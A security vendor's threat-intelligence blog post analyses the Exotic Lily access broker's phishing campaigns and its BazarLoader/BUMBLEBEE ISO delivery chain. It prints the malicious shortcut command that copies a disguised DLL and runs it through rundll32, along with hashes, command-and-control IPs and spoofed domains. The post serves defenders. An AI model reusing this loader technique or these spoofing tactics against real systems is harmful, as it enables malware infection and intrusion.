Bazarloader & Exotic Lily Analysis | VerSprite Cybersecurity Bazarloader & Exotic Lily Analysis | VerSprite Cybersecurity

Home  |  Resources  |  Security Research

Bazarloader & Exotic Lily Analysis

Learn how Exotic Lily gets a foothold in your company's infrastructure and then sells the access to the highest bidder.

Uddip Ranjan ● April 27, 2022

< Back to Blog Home

In the month of September 2021, Google TAG researchers discovered a financially motivated threat actor, Exotic LILY. These threat actors were exploiting zero-days in Microsoft’s MSHTML (CVE-2021-40444)

Exotic Lily is an Initial access broker. These threat actors specialize in breaching a company and then selling the access to the highest bidder, and among the interested parties who bid for the same, were Conti and Diavol ransomware groups. To breach such companies, it was observed that Exotic Lily was using mass emailing/spoofing campaigns (5000+ emails per day) to attack more than 600 companies. Exotic Lily shifted its focus from IT, Healthcare, and cybersecurity companies to a broader spectrum of companies. Exotic Lily has an unusual level of human interaction while performing these campaigns. Based on the working hours of the group, it can be concluded that the group was from the Eastern/Central European region.

Exotic lily is also known by these names:

  • Wizard Spider by Crowdstrike
  • DEV-0193 by Microsoft
  • FIN12 by Mandiant

A few days ago, Google TAG Researchers spotted ISO files being used as malware delivery methods. These were specifically made to deliver Bazaar loader DLL files.


After successful initial contact, the attackers sends the malicious file.

File transfer services like OneDrive, TransferNow, and WeTransfer were used to send out these malicious ISO files as attachments in the mass email campaigning.


Link to TransferNow to download the malware.

The malware is called BUMBLEBEE because it uses a unique user agent, “bumblebee”. BUMBLEBEE uses Windows Management Instrumentation to collect the system data, and then exfiltrate the data in a JSON format. Once this is done, the malware waits for commands from the CNC server. It was also noticed that the CNC server deploys a Cobalt Strike payload.

Exotic Lily used identity spoofing to make fake domains of legitimate businesses by replacing TLD with “.us”, “.co”, or “.biz”. Then the attackers would pose as real company employees by coping their data from sites like LinkedIn, RocketReach, and Crunchbase.

This slide states the initial contact between the attackers and the victims.


Delivery mechanism for the threat actors

The MITRE ATT&CK TTPs used by the threat actor:

  • Initial Access ID: TA0001
    • Phishing ID: T1566
      • Phishing: Spearphishing Attachment ID: T1566.001
  • Execution ID: TA0002
    • User Execution ID: T1204
      • Malicious File ID: T1204.002
    • Windows Management Instrumentation ID: T1047
    • Command and Scripting Interpreter ID: T1059
      • Windows Command Shell ID: T1059.003
  • Privilege Escalation ID: TA0004
    • Exploitation for Privilege Escalation ID: T1068
  • Exfiltration ID: TA0010
    • Exfiltration Over C2 Channel ID: T1041

Sample: BazarLoader ISO.iso

SHA256:9fdec91231fe3a709c8d4ec39e25ce8c55282167c561b14917b52701494ac269
Mounting the ISO file gives us 2 files.

  1. Attachments.lnk
  2. DumpStack.log

Sample: Attachments.lnk

SHA256:6497223d35530f2e510382aa1866b83ffaf215213b8080b7ecb299b6e7e3e6b1

At first the Attachment file looks like a shortcut, nothing wrong, huh?
When we opened the shortcuts panel, we discovered the target field with some command.
C:\Windows\System32\cmd.exe /c xcopy /y DumpStack.log c:\programdata\ && C:\Windows\System32\rundll32.exe C:\programdata\DumpStack.log,spload && exit

Processes that were started after clicking the attachment.lnk file

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\user\AppData\Local\Temp\Attachments.lnk

    • C:\Windows\System32\cmd.exe
      C:\Windows\System32\cmd.exe" /c xcopy /y DumpStack.log c:\programdata\ && C:\Windows\System32\rundll32.exe
      C:\programdata\DumpStack.log,spload && exit

      • C:\Windows\system32\xcopy.exe
        xcopy /y DumpStack.log c:\programdata\
      • C:\Windows\System32\rundll32.exe
        C:\Windows\System32\rundll32.exe C:\programdata\DumpStack.log,spload\

Sample: DumpStack.log

SHA256:4bc9368951402ceeeb84da58c82e02a4ea9e09f5a4425daf5094ea5d87a14e9a
Compiler time stamp: Tue Jan 18 13:47:09 2022 UTC

Doing a file command on the DumpStack.log file tells us that it is an executable file for windows.

file DumpStack.log
DumpStack.log: PE32+ executable (DLL) (GUI) x86-64, for MS Windows

Exports by the pe file as indicated by pestudio.
FRdCdoy8j
LcG8EAd0FAZYIxP
spload ------> Function called by the DumpStack.log file.
wsscUWQIzudQGV
zzKKJMT02C

IP connections made by the malware while executing the DumpStack.log

23.81.246[.]187
185.52.0[.]55
89.163.140[.]67
198.50.135[.]212
45.76.254[.]23
107.174.68[.]120
194.36.144[.]87
51.89.88[.]77
95.217.190[.]236

Domain connections made by the malware:

3conlfex[.]com
avrobio[.]co
elemblo[.]com
phxmfg[.]co
modernmeadow[.]co
lsoplexis[.]com
craneveyor[.]us
faustel[.]us
lagauge[.]us
missionbio[.]us
richllndmetals[.]com
kvnational[.]us
prmflltration[.]com
brightlnsight[.]co
belcolnd[.]com
awsblopharma[.]com
amevida[.]us
revergy[.]us
al-ghurair[.]us
opontia[.]us
bluehail[.]bazar
whitestorm9p[.]bazar
reddew28c[.]bazar

BazarLoader ISO samples:

5ceb28316f29c3912332065eeaaebf59f10d79cd9388ef2a7802b9bb80d797be
9fdec91231fe3a709c8d4ec39e25ce8c55282167c561b14917b52701494ac269
c896ee848586dd0c61c2a821a03192a5efef1b4b4e03b48aba18eedab1b864f7

Recent BUMBLEBEE ISO samples:

9eacade8174f008c48ea57d43068dbce3d91093603db0511467c18252f60de32
6214e19836c0c3c4bc94e23d6391c45ad87fdd890f6cbd3ab078650455c31dc8
201c4d0070552d9dc06b76ee55479fc0a9dfacb6dbec6bbec5265e04644eebc9
1fd5326034792c0f0fb00be77629a10ac9162b2f473f96072397a5d639da45dd
01cc151149b5bf974449b00de08ce7dbf5eca77f55edd00982a959e48d017225

Virus total graph for the summary of the malware:

 

References

https://www.trmlabs.com/post/analysis-corroborates-suspected-ties-between-conti-and-ryuk-ransomware-groups-and-wizard-spider
https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/ https://www.virustotal.com/gui/collection/55ef10a1ff5363ec2272ba135e7974fcfda7fc7989e84e65dfb76797a165c3f5

Prevent Ransomware with BreachSeeker & Threat Vulnerability Management

VerSprite’s Threat Intelligence Group provides organizations with real-time threat monitoring, analysis, prevention recommendations, and mitigation. Our elite team works with companies across all industries and security maturity levels to defend against threats. For more information on Versprite’s Threat Intel Group or our botnet detection service, BreachSeeker, contact one of our security advisers today. Learn More →

We are an international squad of professionals working as one.

logos